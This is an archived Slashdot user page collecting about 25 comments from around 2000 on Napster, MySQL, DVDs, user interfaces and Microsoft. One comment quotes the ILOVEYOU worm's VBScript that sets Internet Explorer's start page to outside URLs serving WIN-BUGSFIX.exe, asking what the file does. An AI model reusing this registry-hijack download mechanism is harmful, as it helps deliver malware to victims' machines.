Slashdot Mirror


User: Refrag

Refrag's activity in the archive.

Stories
0
Comments
1,222
First seen
Last seen
Profile
(view on slashdot.org)

Comments · 1,222

  1. Re:Bad Precedent on RIAA Claims Initial Legal Win vs. Napster · · Score: 1

    Oh no! You can't do that! You can't invite friends over to your house and play CD's for them. Clearly this would be in violation of the copyright. It's a public performance.

    I think if the RIAA had it's way loudspeakers would be illegal and you'd have to listen to music over stereophones.

    I use Napster. I buy CD's. (fewer since prices went up $3 in the past few years to $15, I've been used to $11.99 CD's) I use Napster to see if I want to buy a CD. The most recent example is Smashing Pumpkin's Machina. I used Napster to make sure that I would like the CD, and when I had heard enough tracks from the album I decided to purchase it -- which I did.

    I also discovered Save Ferris after downloading their cover of Come on Eileen and subsequently purchased their CD entitled It Means Everything.

  2. Even Jet 4.0 has RLL! on Why Not MySQL? · · Score: 1

    Damn, I have thought about getting MySQL to play with on my computers at home. But when I read that it only does table level locking, I push all of those desires right out of my mind. Even Jet 4 has row level locking, and before that it had page level locking!

    How does /. function with just table level locking? Do you turn that off and have no locks?

  3. Re: Lookout! on I Love You "Virus" Hates Everyone · · Score: 1

    Lookout is actually the name that a lot of people use to refer to it internally at Microsoft. I think I even heard of a story where BillG referred to it as Lookout once... don't remember.

  4. ILOVEYOU trojan tries to download bugfix? on I Love You "Virus" Hates Everyone · · Score: 1

    In the following code you can see that the trojan is setting IE's default page to one of four URL's that are a link to a file called WIN-BUGSFIX.EXE. I haven't been able to connect to any of the URL's at the user's home dir level yet because my request keeps timing out. Does anyone know what this file does? Is it just a way for the trojan to keep track of computers it has already run from?

    if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
    Randomize
    num = Int((4 * Rnd) + 1)
    if num = 1 then
    regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhj kxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7 679njbvYT/WIN-BUGSFIX.exe"
    elseif num = 2 then
    regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfd jghKJnwetryDGFikjUIyqwerWe546786324hjk4j nHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
    elseif num = 3 then
    regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRp Gqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbv g/WIN-BUGSFIX.exe"
    elseif num = 4 then
    regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNB mnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPh jasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg /WIN-BUGSFIX.exe"
    end if
    end if

  5. Re:Maybe this can get companies to consider UNIX? on I Love You "Virus" Hates Everyone · · Score: 1

    What do MTA & MUA stand for?

  6. Re:Good in theory on Ensuring Permanence Of Online Scientific Journals · · Score: 1

    Your library must suck. The card-catalog computers in the Public Library of Charlotte & Mecklenburg County are new NEC computers that are built into an LCD monitor! They only run one app! I have rarely been to the library, I need to go more often, but I've also noticed that they have iMacs in what looks like the media section of the library, and other PC's scattered here and there.

    I think that this idea has some merit, but nothing that should libraries should allocate large amounts of money to, but worthwhile still. I hope they are archiving them in plaintext, though.

  7. Re:Honorable Goal on Meeting with Netpliance · · Score: 1

    But you don't want their service. They don't make much money if any on the hardware, so if they sold them "in the hundreds" to people that wanted to hack them, it would be wasted effort on their part. I can understand it. It's like if someone hacked a Dreamcast to put Linux on it... Sega doesn't make any money off of the hardware, it's mainly from licensing.

  8. Re:no problemo on Advertising in Your Boot Sequence? · · Score: 1

    But those people developed the code, and it only took up one line (probably a line used for other information anyway). MP3.com didn't develop any of the code, they "sponsored" it. And there are way too many sponsors flying by which reduces the signal/noise ratio. Sponsorship notices should go in an "about" window, not fly by during boot.

  9. The boot screen of NT is advertising... on Advertising in Your Boot Sequence? · · Score: 1

    For Microsoft!

  10. Re:Why not even html on Can XML Replace Proprietary Document Formats? · · Score: 1

    Ever heard of file compression? You'd be amazed at how well a text file will compress!

    ...well, I wouldn't, but maybe you would.

  11. Re:Already Happened on Can XML Replace Proprietary Document Formats? · · Score: 3

    No, it hasn't. I worked for Microsoft during the rollout of Off2000. Word2000's file format is read & write compatible with Word97's. That means it hasn't changed a whole lot if at all since the last rev. (for once)

    XML is used in HTML files created by Off2000 applications (except for FrontPage) to use in "round-tripping" of HTML files from source app, to HTML app, back to source app. You see, there is a small application that reads the XML tags in the HTML files and sends it off to the source app for further editing when you Edit the document. Some information is also stored in the HTML file in XML complient tags to help the source app to provide it with further information about the original source document -- to make it appear seamless.

    FrontPage strips these XML tags out of the HTML files and breaks round-tripping.

  12. Re:Voice Recognition/Activation on What Is Important In A User Interface? · · Score: 1

    Mental controlling won't work! Haven't you ever seen Macross Plus? ;)

  13. Speech Recognition on What Is Important In A User Interface? · · Score: 1

    Isn't speech recognition just like going back to a CLI in terms of intuitiveness? They're both verbal interfaces (VI). I honestly think that some form of GUI is always going to be more intuitive than a VI. I'm not talking strictly about Apple's, Microsoft's, or Be's vision of a GUI, but anything that resprsents the interface visually -- be it 2D or 3D.

  14. Consistency! on What Is Important In A User Interface? · · Score: 1

    ...and a plan.

  15. Re:Maybe Compaq should sue Apple.... on Apple Possibly Pursuing Another iMac-look Clone · · Score: 1

    Have you never seen the original Macintosh?

  16. Re:Whoever made translucent phones in 80s sue Appl on Apple Possibly Pursuing Another iMac-look Clone · · Score: 1

    #1 has already been done. Ferrari uses translucent (or transparent, depends on how you see it) material for its engine cover on several cars.

  17. Re:Here we go again.. on Microsoft Pits Pocket PC Against Palm · · Score: 1

    Why? Do you think Palm and Handspring are going to have trouble competing with them? Linux shouldn't be on a palmtop (and neither should Windows), just like PalmOS shouldn't be on a desktop. My next palmtop purchase will either be a Palm (flashable ROM) or a Visor (Springboard socket). WinCE or Pocket PC are too bloated for a palmtop.

  18. Netflix is better anyway on Miramax To Distribute Films Over Net? · · Score: 2

    Netflix distributes movies over the Net... kinda. OK, so you rent your DVD's from Netflix and they send them to you in the mail. It still beats this Miramax crap and Blockbuster. Who would turn down unlimited rentals (only 4 discs out at once) for around $20 a month?

    Am I the only one that opposes total electronic distribution of art? I like holding my DVD's, CD's, and books.

  19. What a waste... on Miramax To Distribute Films Over Net? · · Score: 1

    ...of bandwidth. Everyone talks about all of the great things that they will be able to do over the Net once most people have broadband connections. What they fail to realize is that much of what they want to do already has better channels of distribution and will be a large drain on bandwidth. Once everyone has Cable or DSL service and is downloading Mighty Aphrodite from Miramax everything will slow down, and it'll be like everyone has 33.6 modems again.
    Keep Net transfers slim!

  20. Re:Angry at Marketing on Star Wars EP1 On DVD Confirmed By Lucas · · Score: 1

    Special editions take longer to produce. They wanted to get product out as soon as possible. That is the reason for a few month gap between some DVD's and their special edition.

    In this case Disney announced both editions at the same time, so you have no one to blame but yourself.

  21. Re:hmm... on Star Wars EP1 On DVD Confirmed By Lucas · · Score: 1

    Company X produces Application Y for Macintosh. You want to run Application Y on your Windows 2000 box. Are you going to boycott Company X because they don't make Application Y available for all platforms?

    I bought a DVD player so that I could watch DVD's. I intend to watch DVD's in the comfort of my living room, a DVD player is the only acceptable solution to this. The DVD player is the platform, the movie is the application. I don't expect the movie to play on any device that has a tray big enough to hold a 5" disc. What you want is a DVD player for Linux. What you have is a DVD-ROM drive for Linux. Just because the two technologies are similar doesn't mean they are interchangable. I don't go around saying "BOYCOTT ENCYCLOPEDIA BRITANICA" because their DVD-ROM encyclopedia doesn't play on my DVD player. Geez...

    It'd be nice to have a completely open media format to watch movies on, but we've never had that and I doubt we ever will.

  22. Re:Er, okay. on Starwars Episode 1 DVD? · · Score: 1

    The Digital Bits were reporting on an interview with George Lucas from some radio station out in Cali. So, I'd say it's at least 10% better than a rumor. (since Lucas' word is shit)

  23. Re:Amazon gets a taste of their own Medicine! on Amazon Sued For Patent Infringement · · Score: 1

    I don't see anything wrong with it. All Barnes & Noble does is copy-cat Amazon.

  24. Re:Amazon gets a taste of their own Medicine! on Amazon Sued For Patent Infringement · · Score: 1

    ...I don't seem to recall Amazon sueing anyone over patent-infringement. At least nothing frivolous. There is nothing wrong with obtaining patents, just enforcing them frivolously.

  25. Re:But is this really for the better? on Microsoft Loses · · Score: 1

    NASDAQ was already downward-trending before Monday. I wouldn't attribute all of the 350 point drop to MS.